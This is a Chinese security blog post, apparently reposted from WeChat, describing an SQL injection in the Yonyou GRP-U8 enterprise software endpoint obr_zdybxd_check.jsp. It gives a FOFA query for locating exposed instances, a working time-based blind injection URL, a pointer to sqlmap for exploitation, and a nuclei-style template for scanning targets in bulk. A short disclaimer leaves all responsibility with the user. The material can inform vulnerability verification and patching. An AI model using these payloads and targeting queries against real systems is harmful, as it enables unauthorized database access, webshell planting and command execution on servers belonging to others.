用友GRP U8 obr_zdybxd_check.jsp sql注入

admin 2024年1月22日14:39:38评论18 views字数 1001阅读3分20秒阅读模式
免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

01
0x01漏洞描述

用友GRP-U8是一款由用友软件开发的企业级管理软件,也被称为用友U8。它是用友公司的核心产品之一,旨在帮助企业实现全面的信息化管理和运营。

用友GRP-U8提供了一系列功能模块,涵盖了企业资源规划(ERP)、财务会计、人力资源管理、供应链管理、生产制造、销售与客户关系管理等方面。它可以帮助企业集中管理和控制各个业务流程,提高工作效率、降低成本,并提供决策支持和业务分析等功能。

用友GRP-U8 obr_zdybxd_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
02
0x02 漏洞复现 
fofa语法:app="用友-GRP-U8"

用友GRP U8 obr_zdybxd_check.jsp sql注入

POC:/u8qx/obr_zdybxd_check.jsp?mlid=1%27;WAITFOR%20DELAY%20%270:0:5%27--

然后使用sqlmap一把梭:

用友GRP U8 obr_zdybxd_check.jsp sql注入

03
0x03 批量验证
id: GRPU8_obr_zdybxd_check_injectioninfo:  name: GRPU8_obr_zdybxd_check_injection  author: recjl  severity: high  description: Detects delay injection vulnerabilities.tags:  - delay-injectiontype: dynamicrequests:  - method: GET    path:      - "/u8qx/obr_zdybxd_check.jsp?mlid=1';WAITFOR DELAY '0:0:5'--"      - "/u8qx/obr_zdybxd_check.jsp?mlid=1';WAITFOR DELAY '0:0:10'--"    matchers-condition: or    matchers:      - type: latency        compare:          operator: greater-than          value: 4s
用友GRP U8 obr_zdybxd_check.jsp sql注入
用友GRP U8 obr_zdybxd_check.jsp sql注入
END
用友GRP U8 obr_zdybxd_check.jsp sql注入
用友GRP U8 obr_zdybxd_check.jsp sql注入
点击蓝字  关注我们

原文始发于微信公众号(爱喝酒烫头的曹操):用友GRP U8 obr_zdybxd_check.jsp sql注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月22日14:39:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友GRP U8 obr_zdybxd_check.jsp sql注入http://cn-sec.com/archives/2418015.html

发表评论

匿名网友 填写信息